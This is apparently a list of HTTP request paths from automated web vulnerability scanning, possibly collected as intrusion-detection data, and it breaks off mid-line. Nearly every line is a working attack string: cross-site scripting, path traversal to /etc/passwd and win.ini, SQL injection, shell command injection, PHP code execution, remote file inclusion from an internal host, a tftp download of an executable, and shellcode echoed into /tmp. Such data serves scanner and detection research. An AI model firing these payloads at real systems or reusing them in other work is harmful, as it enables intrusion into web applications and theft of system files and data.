\n/pxagj7n7.php3?<script>cross_site_scripting.nasl</script>\n/javascript/.htpasswd.sfish/skipfish~string\n/7u1pb2xi.jspa?<script>document.cookie=\"testlwwz=718;\"</script>\n/en-us/h5sc3gxy.cfm?<script>cross_site_scripting.nasl</script>\n/yver8r9o.cfc?<script>cross_site_scripting.nasl</script>\n/aj3pf49c.exe?<script>document.cookie=\"testnofv=4170;\"</script>\n/en-us/fo564rei.kspx?<script>cross_site_scripting.nasl</script>\n/recordings/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/ao22ww7y.php?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/nsn/..\\util/chkvol.bas\n/scripts/awstats.cgi\n/cgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/cfide/scripts/ajax/fckeditor/\n//<body><script/src=\"http://www.example.com/test?rnd=q45644755\"></script>\n/i7prbs22.idc?<script>document.cookie=\"testjnre=7328;\"</script>\n/1qwv2p5p.htm?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/main.php?logout=\"\\x0ddel q33212666 #\n/82q7ywa8.php?<script>document.cookie=\"testpwew=1315;\"</script>\n/javascript/.htpasswd.sfish///skipfish.invalid/;?\n/pxagj7n7.cfc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/opendir.php?/etc/passwd\n/n9xlumt5.mscgi?<script>cross_site_scripting.nasl</script>\n/rbec2ohx.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testcqwz=9752;\"</script>\n/docs/<script>alert('vulnerable');</script>\n/<script>document.cookie=\"testpokn=7494;\"</script>\n/manager/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/printsubscriptions/\n/examples/jsp/sessions/forum_2.php?msg=10&return=<script>foo</script>\n/vwmg565s.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/mylog.html?screen=/etc/passwd\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/2aibfaczmac8?\n//a=\"%3cscript%20src=%27http://www.example.com/test?rnd=q31137192%27%3e%3c%2fscript%3e\";document.writeln(unescape(a))\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- \n//</p><body><script/src=\"http://www.example.com/test?rnd=q46816947\"></script><p>\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010410',null,null,null,null --\n/msagent-vbscript/\n/examples/jsp/sessions/whois.cgi?action=load&whois=;id\n/scripts/roschedule.php\n/0u75ldxq.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&ver\\x0b>q72441193&rem\\x0b\n/33y9gcqq.asp?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/tuwjta1w.php?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/scripts/prnnucptkixl.html\n/examples/jsp/jsp2/el/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/main.php?stuff=\"\\x0ddel\\x09q27469451\\x09#\n/gy23xnjq.exe?<script>cross_site_scripting.nasl</script>\n/cgi-bin/cal_week.php?op=week&catview=999'\n/javascript/standards.exe\n/scripts/irbf6nj7oyfh.cfm\n/d7ktpmcq.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/appl.exe\n/a0imiuf1.mscgi?<script>document.cookie=\"testxqrn=4654;\"</script>\n/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/cgibin/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/vmi8bb12.php?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/examples/jsp/error/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/recordings/faxsurvey?cat /etc/passwd\n/javascript/document.ppt\n/phpmyadmin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/javascript/seed.exe\n/javascript/d.exe\n/cgi-sys/gw5/gwweb.exe?help=bad-request\n/examples/jsp/cal/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/htpasswd/\n/examples/jsp/jsp2/jspx/survey.inc.php?path=/etc/passwd\\x00\n/en-us/account/simple/view_page?mv_arg=|cat /etc/passwd|\n/scripts/cal_week.php?op=week&catview=999'\n/main.php?logout=\"&rm q83422114 #\n/javascript/manifest.mf.exe\n/logo's fabrikanten/\n/examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/examples/jsp/colors/listrec.pl?app=qmh-news&template=;ls /etc|\n/m2fpztty.cfc?<script>cross_site_scripting.nasl</script>\n/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/scripts/pssdseehtgdp.php3\n/scripts/wd7crx47eaml.php\n/v3axg1p8.idc?<script>document.cookie=\"testxagh=6987;\"</script>\n/scripts/whois.php?query=|id\n/examples/jsp/jsp2/el/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/phpmyadmin/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?logout=\"&ver >q52615858&rem \n/ygkjkngd.idc?<script>document.cookie=\"testnago=4518;\"</script>\n/top.php?stuff=;uname #\n/recordings/includes/config.php?relative_script_path=http://xxxxxxx\n/help.php?q=\"|ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/xoops_lib/modules/protector/notification.php?mydirname=a(){}echo(md5('xoops_2_3_2brce'));function+v\n/htbin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/en-us/h5sc3gxy.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/if69ddo1.exe?<script>document.cookie=\"testiabz=5220;\"</script>\n/bin/gw5/gwweb.exe?htmlver=aaa&get-context\n/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/ghl9il?\n/5o9zq43e.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/1992.exe\n/ydexw8by.php3?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/main.php?stuff=\"|ping,-w,7000,-n,1,4.3.2.1|rem,\n/add.php3?url=ja&adurl=javascript:<script>alert('vulnerable')</script>\n/top.php?stuff=\"&rm,q38169729&rem,\n/main.php?logout=\\x0duname >q42999467 #\n/main.php?stuff=\"&ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/cgi-home/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/0w155a7c.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/examples/jsp/num/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/scripts/starnet/addons/slideshow_full.php?album_name='1840670444\n/eg2u8pbv.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/db_input.php\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.kspx\n/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('vulnerable')</script>\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/iroy1gvqrrqu?'\n/top.php?stuff=&uname >q42552299 #\n/odzk29aa.do?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/scripts/8obtsg.exe?/x+/c+tftp -i 192.168.202.118 get nzbobuyh pnrwmkim.exe\n/shoutbox.php?conf=../../../../../../../etc/passwd\n/scripts/b0j2ijssh6cu.inc\n/azcrfs8d.php?<script>document.cookie=\"testjpdr=9205;\"</script>\n/33y9gcqq.jspa?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908727\n/en-us/<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/javascript/htpasswd.yml\n/cgi-win/gwweb.exe?help=bad-request\n/scripts/admin.asp\n/oie504mr.jsp?<script>document.cookie=\"testtpby=7052;\"</script>\n/d765w06j.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/././././././../../../../../windows/win.ini\n/<script>document.cookie=\"testbyqe=7474;\"</script>\n/index.php?page=../../../../../../../../../../../../../../../etc/passwd\n/scripts/logs/hcdiskquotaservice.csv\n/recordings/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/javascript/balance.exe\n/jdx255ea.php?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/z'terminator_1/\n/examples/servlets/servlet/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_h0jv924_]));die;/*\n/javascript/msadc.exe\n/0rufe52p.nsf?<script>cross_site_scripting.nasl</script>\n/vac1l5vm.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uc3w3bdi.html?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/javascript/ubuntu.exe\n/5o9zq43e.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/cxvae_g3rjys.cfm\n/ywaxntrx.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/init.php?scriptpath=http://cirt.net/rfiinc.txt??\n/scripts/qg9h0c0svvat.html\n/main.php?logout=rm;q21667624&rem;\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+50+6a+0c+e8+0c+00+00+00+50+8d+5d+27+53+ff+d0+91+5a+5f+eb+6b+60+89+e5+60+31++>>ctdn\n/scripts/u7m5ok8eqpfy.php\n/gstranscripts/\n/fo564rei.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/javascript/license.exe\n/zln2hm2z.kspx?<script>document.cookie=\"testblcp=8120;\"</script>\n/main.php?logout=\"rm q68212743 #\n/help.php?q='\\x0duname >q49373567 #\n/main.php?stuff=\"uname >q55141299 #\n/scripts/fxm.exe\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,1607725405,0,0,0,0,0--\n/examples/jsp/colors/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/2aibfaczmac8?&cmd=cat/etc/passwd\n/help.php?q=ping;-w;7000;-n;1;4.3.2.1&rem;\n/phpmyadmin/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/help.php?q=\\x0duname >q13423853 #\n/cacti/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/script/tick/test.php?path_to_code=http://192.168.202.118:8080/ghl9il?\n/passwdpk/\n/um7xpn15.aspx?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/en-us/account/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/javascript/p2p.exe\n/help.php?q=\"ping,-w,11000,-n,1,1.2.3.4&rem,\n/o6ebbirj.jspa?<script>cross_site_scripting.nasl</script>\n/recordings/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/tukodz3j.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.inc.php?pathtoscript=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/mpcgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/nyvbv05h.cfm?<script>document.cookie=\"testftxz=5980;\"</script>\n/5qnlm5z2.nsf?<script>document.cookie=\"testsixi=8451;\"</script>\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1075239311,2,231042861,4,5,6,7,8,9,0,1,2,3 --\n/cgi/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/if69ddo1.idc?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/gy23xnjq.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h5i6crm3.cfm?<script>document.cookie=\"testlihk=7070;\"</script>\n/examples/jsp/checkbox/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/iajtej82.exe?<script>cross_site_scripting.nasl</script>\n/fc9t54l7.dll?<script>document.cookie=\"testggad=2000;\"</script>\n/javascript/document.zip\n/javascript/codes.exe\n/7u1pb2xi.cfm?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/examples/jsp/checkbox/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/forum1_professionnel.asp?n=1771&amp;nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini&amp;page=1\n/javascript/family.exe\n/main.php?stuff=\"|ping\\x09-w\\x097000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/javascript/next.exe\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/yzicxmyifv0;echo|awstats291064.txt\n/pxagj7n7.fts?<script>cross_site_scripting.nasl</script>\n/7o5qp766.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/o35zot2r.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6n7aacgg.fts?<script>cross_site_scripting.nasl</script>\n/ddoworrl.mscgi?<script>document.cookie=\"testvlau=8517;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/iljyfcptvy0+>+/dev/null+&'); function v\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php&frm_user=&scr_height=&scr_width=q51964837\n/b5xdqgz2.do?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"del\\xa0q32937989&rem\\xa0\n/examples/jsp/colors/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/examples/jsp/jsp2/el/htmlscript?../../../../../../../../../etc/passwd\n/uvazfs7p.php3?<script>document.cookie=\"testwtbo=4831;\"</script>\n/javascript/portals.exe\n/bzuf9ozq.idc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/cart32.exe\n/javascript/cfdocs.exe\n/6dlc2zm9.cfc?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/x7pclv4s.jspa?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/subscription_accounts/\n/starnet/addons/slideshow_full.php?album_name='2073512306\n/webscripter_professional/\n/examples/jsp/checkbox/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/esmozg5d.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/wa?debug-show-version\n/cgi.cgi/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/a0imiuf1.do?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/en-us/fo564rei.cfc?<script>cross_site_scripting.nasl</script>\n/ybz5rz7a.cfm?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/xlj7h65o.htm?<script>document.cookie=\"testtbbe=856;\"</script>\n/ydexw8by.idc?<script>document.cookie=\"testulex=4996;\"</script>\n/examples/jsp/cal/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/hipkz026.jsp?<script>document.cookie=\"testyrbs=2855;\"</script>\n/main.php?stuff=\"&ping;-w;8000;-n;1;1.2.3.4&rem;\n/scriptingnews2/\n/gy23xnjq.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/33y9gcqq.php?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/main.php?logout=\";uname\\x09>q86216423\\x09#\n/javascript/rtf.exe\n/modules.php?op=modload&name=wiki&file=index&pagename=<script>alert('vulnerable')</script>\n/javascript/hits.exe\n/javascript/packaged.exe\n/6wb70v0b.fts?<script>cross_site_scripting.nasl</script>\n/javascript/key.exe\n/manager/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/eei78ore.nsf?<script>cross_site_scripting.nasl</script>\n/82q7ywa8.pl?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/0z575z74.asp?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/llumt7msyau5y??&cmd=ls\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908740,1,705379658--\n/javascript/downloader.exe\n/hrttz9fj.php?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/cgi-home/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/d5a5renl.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/6n7aacgg.php?<script>cross_site_scripting.nasl</script>\n/javascript/callin.exe\n/examples/jsp/num/config.php?path[docroot]=/etc/passwd\\x00\n/scripts/lrn28issfuqi.pl\n/a0imiuf1.nsf?<script>document.cookie=\"testxqrn=4654;\"</script>\n/help.php?q=uname\\x09>q28292329\\x09#\n/examples/jsp/num/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/scripts/index.php?edit=nonexistant1039175028\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1332010406,4--&blog=1\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/h5sc3gxy.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/examples/jsp/colors/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/ovcgi/ovwebhelp.exe\n/se_tester'schoicelogo/\n/de3v2dd9.nsf?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/save.php?file_save=/etc/passwd\n/javascript/webalizer.exe\nhttp://pjizgstmsezmytmzdudhgoanlryrqyevgutukoucyyhzubhijuwpcnmzcpqkvacnxssovdbegscoacprvpzshmnxaoc.com\n/wa.exe?debug-show-version\n/examples/jsp/num/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/javascript/1999.exe\n/9ko6m4c8.htm?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/en-us/s7qus4g3.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/index.php?cat_select=<script>foo</script>\n/5o9zq43e.mscgi?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.tmp\n/www/delivery/ac.php?bannerid=-1332010390+or+1=1+--+';passthru(base64_decode($_server[http_nessus_crnvjntc]));die;/*\n/en-us/n9xlumt5.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o1zj4u9v.mscgi?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/vmi8bb12.html?<script>document.cookie=\"testlerc=2575;\"</script>\n/xlj7h65o.idc?<script>document.cookie=\"testtbbe=856;\"</script>\n/examples/jsp/jsp2/jspx/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/cacti/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331905213,113095511 -- \n/javascript/file.exe\n/news.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl??\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../vtigerservice.php\\x00\n/phpmyadmin/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/scripts/event_view.php?eid=34 union select 1183395596\n/6wb70v0b.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd\\x00\n/en-us/w4996nr0.nsf?<script>document.cookie=\"testttvs=7163;\"</script>\n/main.php?logout=ping;-w;9000;-n;1;1.2.3.4|rem;\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\\x00\n/en-us/account/index.php?cat='\n/javascript/document.png\n/sdk/../../../../../../etc/vmware/hostd/vminventory.xml\n/index.php?categories=1&cat=xx' union/**/  select '1','412675581480','2','comments' /*\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs\"=sleep(4)=\"\n/examples/jsp/checkbox/search/show.pl?url=file:/etc/passwd\n/recordings/index.php?id='union/**/select/**/0,0,1161314398,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/jw64yq8u.nsf?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/examples/servlets/servlet/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/ygkjkngd.php3?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/main.php?stuff=\";uname\\x09>q19299327\\x09#\n/help.php?q=ver\\xa0>q27113942&rem\\xa0\n/article.php?sid=\\\"><img src=javascript:alert('vulnerable')><img src=\\\"\n/d44uk9h2.php?<script>document.cookie=\"testmybc=2088;\"</script>\n/cgi-bin/index.php?id=h6xj4vcok1'\n/1qwv2p5p.htm?<script>document.cookie=\"testvqcy=252;\"</script>\n/javascript/gateway.exe\n/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/jsp2/el/forum_2.php?msg=10&return=<script>foo</script>\n/nyvbv05h.aspx?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/javascript/pop.exe\n/examples/jsp/sessions/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/help.php?q='\\x0asleep\\x099\\x09#\n/top.php?stuff=\"&ping -w 7000 -n 1 4.3.2.1&rem \n/a0imiuf1.cgi?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/fnwhrxyd.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/lang/lang.php?lang_path=/etc/passwd\\x00\n/javascript/events.exe\n/main.php?logout=rm;q78779487&rem;\n//</p><body><script src=http://www.example.com/test?rnd=q96411428></script><p>\n/rbec2ohx.fts?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/top.php?header=../../../../../../../../etc/passwd\n/main.php?logout=\"|ping,-w,11000,-n,1,1.2.3.4|rem,\n/nsn/..\\util/md.bas\n/t3af3tdz.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t3af3tdz.aspx?<script>cross_site_scripting.nasl</script>\n/en-us/odzk29aa.kspx?<script>document.cookie=\"testtfvh=2141;\"</script>\n/cgi-exe/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/en-us/jnv890lt.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/guestbook.php\n/advancedbashscriptingguide/\n/examples/jsp/cal/js/scripts.php?load=/etc/passwd\\x00\n/main.php?stuff=\"|ping -w 11000 -n 1 1.2.3.4|rem \n/phpmyadmin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/en-us/esmozg5d.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/source?v=../../../../../../../../../../etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --\n/nsn/..\\util/dir.bas\n/templates/prescription/\n/ht8pn8uq.x?<script>cross_site_scripting.nasl</script>\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../vtigerservice.php\\x00\n/javascript/crack.exe\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332010406,4--&blog=1\n/don't panic/\n/n9xlumt5.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/d7ktpmcq.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/a1disp3.cgi?/../../../../../../etc/passwd\n/javascript/chris.exe\n/examples/jsp/sessions/texis.exe/?-dump\n/3m5knyc4.jspa?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/tukodz3j.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+1a+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq\n/gepi/gestion/savebackup.php?filename=http://192.168.202.96:8080/txenjrxf3?&cmd=cat/etc/passwd\n/help.php?q=ver\\x09>q23929766&rem\\x09\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\\x00\n/javascript/mailman.exe\n/phpmyadmin/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/cgi-bin/fileseek2.cgi?head=&foot=;cat /etc/passwd\n/cgi-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/examples/jsp/sessions/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/a0imiuf1.pl?<script>document.cookie=\"testxqrn=4654;\"</script>\n/if69ddo1.exe?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/index.php?news7[\"functions\"]=http://192.168.202.118:8080/ghl9il?\n/phpmyadmin/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/en-us/dda2qr7j.php?<script>cross_site_scripting.nasl</script>\n/manager/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/themes/simple/user_style.php?user_colors[bg_color]=\"</style><script>alert(411146083423)</script>\n/destiny's-child/\n/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=\";echo ''; echo `id `;die();echo\"\n/scripting_faq/\n/606wkcop.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&del\\x09q42671474&rem\\x09\n/viagra_prescription/\n/examples/jsp/jsp2/el/cart32.exe\n/main.php?frm_daynight=q28628781&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=&scr_width=\n/javascript/contract.exe\n/main.php?stuff='\\x0ddel\\x09q12818567\\x09#\n/main.php?stuff=\"&ver&rem\\x0c\n/scripts/addentry.php\n/admin/index.php/\"><script>alert(410145568170)</script><td class=\"p\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/swgnhpydbq0t?\n/scripts/www/delivery/ac.php?bannerid=-225+or+1=1\n/scripts/ion-p?page=../../../../../etc/passwd\n/w4996nr0.mscgi?<script>document.cookie=\"testttvs=7163;\"</script>\n/o1zj4u9v.kspx?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/javascript/filelist.exe\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/ipb5ri?\n/examples/jsp/jsp2/jspx/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/examples/jsp/colors/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/static//../../../../../../../../etc/passwd\\x00\n/valentine's day tips for single parents/\n/guru - the street scriptures/\n/examples/servlets/servlet/newsdesk.cgi?t=../../../../../../etc/passwd\n/?<script>document.cookie=\"testfuqi=4189;\"</script>\n/examples/jsp/checkbox/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/ashopcom-xss/\n/help.php?q=\"&del,q45293431&rem,\n/examples/jsp/colors/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/en-us/n9xlumt5.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping;-w;8000;-n;1;4.3.2.1&rem;\n/changesubscription/\n/newsarchive.php?path_to_script=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=ls\n/examples/jsp/jsp2/el/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'--\n/wrt54scriptgenerator/\n/cacti/save.php?file_save=/etc/passwd\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0247\\0026\\0211\\0340j\\0020pr\" >> /tmp/gjvtlghpjb0;echo|awstats127569.txt\n/cgi-local/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/cacti/al_initialize.php?alpath=/etc/passwd\\x00\n/cacti/pfdispaly?../../../../../../etc/passwd\n/main.php?stuff=\"ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/recordings/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n//................etc/passwd\n<script>document.cookie=\"testlwwz=718;\"</script>\n/miz4r5hz.dll?<meta http-equiv=set-cookie 